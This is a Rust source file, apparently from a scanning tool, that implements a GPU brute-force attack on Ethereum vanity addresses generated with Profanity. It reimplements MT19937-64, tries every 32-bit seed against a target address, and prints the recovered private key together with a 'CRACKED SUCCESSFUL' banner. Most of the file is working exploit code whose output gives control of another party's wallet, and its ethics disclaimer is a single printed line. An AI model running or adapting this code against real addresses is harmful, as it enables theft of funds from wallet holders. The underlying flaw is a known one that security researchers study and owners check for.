#[cfg(feature = "gpu")]
use crate::scans::gpu_solver::GpuSolver;
#[cfg(feature = "gpu")]
use anyhow::Context;
use anyhow::Result;
#[cfg(feature = "gpu")]
use tracing::{info, warn};

#[cfg(not(feature = "gpu"))]
pub fn run(_target: Option<String>) -> Result<()> {
    anyhow::bail!("This scanner requires GPU acceleration. Please recompile with --features gpu");
}

/// MT19937-64 PRNG for private key derivation
/// Matches C++11 std::mt19937_64 implementation
#[cfg(feature = "gpu")]
struct MT19937_64 {
    mt: [u64; 312],
    mti: usize,
}

#[cfg(feature = "gpu")]
impl MT19937_64 {
    const NN: usize = 312;
    const MM: usize = 156;
    const MATRIX_A: u64 = 0xB5026F5AA96619E9;
    const UM: u64 = 0xFFFFFFFF80000000; // Most significant 33 bits
    const LM: u64 = 0x7FFFFFFF; // Least significant 31 bits
    
    fn new(seed: u64) -> Self {
        let mut mt = [0u64; 312];
        mt[0] = seed;
        
        for i in 1..Self::NN {
            mt[i] = 6364136223846793005u64
                .wrapping_mul(mt[i - 1] ^ (mt[i - 1] >> 62))
                .wrapping_add(i as u64);
        }
        
        Self {
            mt,
            mti: Self::NN,
        }
    }
    
    fn extract(&mut self) -> u64 {
        if self.mti >= Self::NN {
            self.twist();
        }
        
        let mut x = self.mt[self.mti];
        self.mti += 1;
        
        x ^= (x >> 29) & 0x5555555555555555;
        x ^= (x << 17) & 0x71D67FFFEDA60000;
        x ^= (x << 37) & 0xFFF7EEE000000000;
        x ^= x >> 43;
        
        x
    }
    
    fn twist(&mut self) {
        for i in 0..Self::NN {
            let x = (self.mt[i] & Self::UM) | (self.mt[(i + 1) % Self::NN] & Self::LM);
            let mut xa = x >> 1;
            if x & 1 != 0 {
                xa ^= Self::MATRIX_A;
            }
            self.mt[i] = self.mt[(i + Self::MM) % Self::NN] ^ xa;
        }
        self.mti = 0;
    }
}

/// Derive 256-bit private key from 32-bit seed using MT19937-64
#[cfg(feature = "gpu")]
fn derive_private_key(seed: u64) -> [u8; 32] {
    let mut rng = MT19937_64::new(seed);
    
    // Generate 4x 64-bit numbers
    let parts = [
        rng.extract(),
        rng.extract(),
        rng.extract(),
        rng.extract(),
    ];
    
    // Pack to bytes (little-endian, matching Profanity's behavior)
    let mut privkey = [0u8; 32];
    for i in 0..4 {
        for j in 0..8 {
            privkey[i * 8 + j] = ((parts[i] >> (j * 8)) & 0xFF) as u8;
        }
    }
    
    privkey
}

/// Profanity Vanity Address Vulnerability Scanner
/// Brute-forces 32-bit seeds used by Profanity's mt19937_64 RNG
#[cfg(feature = "gpu")]
pub fn run(target: Option<String>) -> Result<()> {
    info!("Profanity Vanity Address Vulnerability Scanner (GPU)");

    let target_addr_str = target.context("Target address required for Profanity scan")?;
    info!("Target Address: {}", target_addr_str);

    // Parse Ethereum address (remove 0x prefix if present)
    let clean_addr = target_addr_str.trim_start_matches("0x");
    let target_bytes = hex::decode(clean_addr).context("Invalid hex address")?;

    if target_bytes.len() != 20 {
        anyhow::bail!("Invalid Ethereum address length: {}", target_bytes.len());
    }

    info!("Initializing GPU Solver...");
    let solver = GpuSolver::new()?;
    info!("[GPU] Solver initialized.");

    // Search space: 0 to 2^32
    let total_seeds = 4_294_967_296u64;

    info!("Scanning {} seeds...", total_seeds);

    let start_time = std::time::Instant::now();

    let seeds = solver.compute_profanity(total_seeds, &target_bytes)?;

    if !seeds.is_empty() {
        warn!("\n[GPU] 🔓 CRACKED SUCCESSFUL!");
        warn!("================================================================================");
        
        for seed in seeds {
            warn!("Found Seed: {}", seed);
            
            // Derive private key from seed
            let privkey = derive_private_key(seed);
            let privkey_hex = hex::encode(privkey);
            
            warn!("Private Key: 0x{}", privkey_hex);
            warn!("--------------------------------------------------------------------------------");
            warn!("⚠️  WARNING: This private key controls the target address!");
            warn!("⚠️  Use responsibly and ethically. Unauthorized access is illegal.");
            warn!("================================================================================");
        }
    } else {
        info!("\nScan complete. No match found.");
        info!("This address was NOT generated by vulnerable Profanity with a 32-bit seed.");
    }

    info!("Time elapsed: {:.2}s", start_time.elapsed().as_secs_f64());

    Ok(())
}